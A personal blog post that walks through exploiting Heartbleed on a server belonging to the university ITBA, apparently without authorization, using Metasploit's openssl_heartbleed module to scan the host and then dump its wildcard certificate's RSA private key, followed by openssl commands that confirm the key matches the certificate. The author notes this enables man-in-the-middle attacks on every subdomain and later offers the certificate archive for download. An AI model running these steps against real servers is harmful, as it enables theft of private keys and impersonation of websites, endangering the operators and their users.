In this post I will explain how I managed to download the private key of an SSL certificate, essentially allowing me to install a valid copy of it on a personal server, and impersonate any website the original web server is hosting without triggering any validation errors.

Server discovery

Using I found that the server located at, under the domain of ITBA, was vulnerable to Heartbleed because of an outdated OpenSSL installation. To test this, I used the Metasploit Framework, targeted at said IP address.

msf auxiliary(openssl_heartbleed) > set rhosts
rhosts =>
msf auxiliary(openssl_heartbleed) > set action SCAN
action => SCAN
msf auxiliary(openssl_heartbleed) > run
[+]   - Heartbeat response with leak
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

After confirming that the server was indeed vulnerable, we can now configure Metasploit to fire multiple requests at the server, hoping to find a private key in the memory dumps received. After a few requests, we get the private key of the certificate being used to provide HTTPS access to the web server.

msf auxiliary(openssl_heartbleed) > set action KEYS
action => KEYS
msf auxiliary(openssl_heartbleed) > run
[+]   - Found factor at offset ef97
[+]   - 2016-07-24 15:13:09 UTC - Got the private key
[*]   - -----BEGIN RSA PRIVATE KEY-----

Private key verification

To verify the private key, we must first download the certificate of the vulnerable server:

openssl s_client -showcerts -connect
depth=3 /C=US/O=The Go Daddy Group, Inc./OU=Go Daddy Class 2 Certification Authority
verify error:num=19:self signed certificate in certificate chain
verify return:0
Certificate chain
 0 s:/OU=Domain Control Validated/CN=*
   i:/C=US/ST=Arizona/L=Scottsdale/, Inc./OU= Daddy Secure Certificate Authority - G2

Because the modulus of the keys are too long to compare by eye, we can calculate the MD5 hash of both of them, which is much easier to compare by just looking at it:

$ openssl x509 -noout -modulus -in public.crt | openssl md5

$ openssl rsa -noout -modulus -in private.key | openssl md5

As you can see, both keys, the public and private pair, share the same modulus. This must mean that the private key corresponds to the downloaded public pair.


Being a wildcard certificate for *, we can execute a MITM attack at any subdomain without triggering any validation error, not only to the one used to obtain the certificate.

Update (20/9/2016)

As the exposed certificate has already been revoked and replaced, I am making it available for everyone to download. Click here to downlaod itba.fullchain.crt.tar.gz

Next Post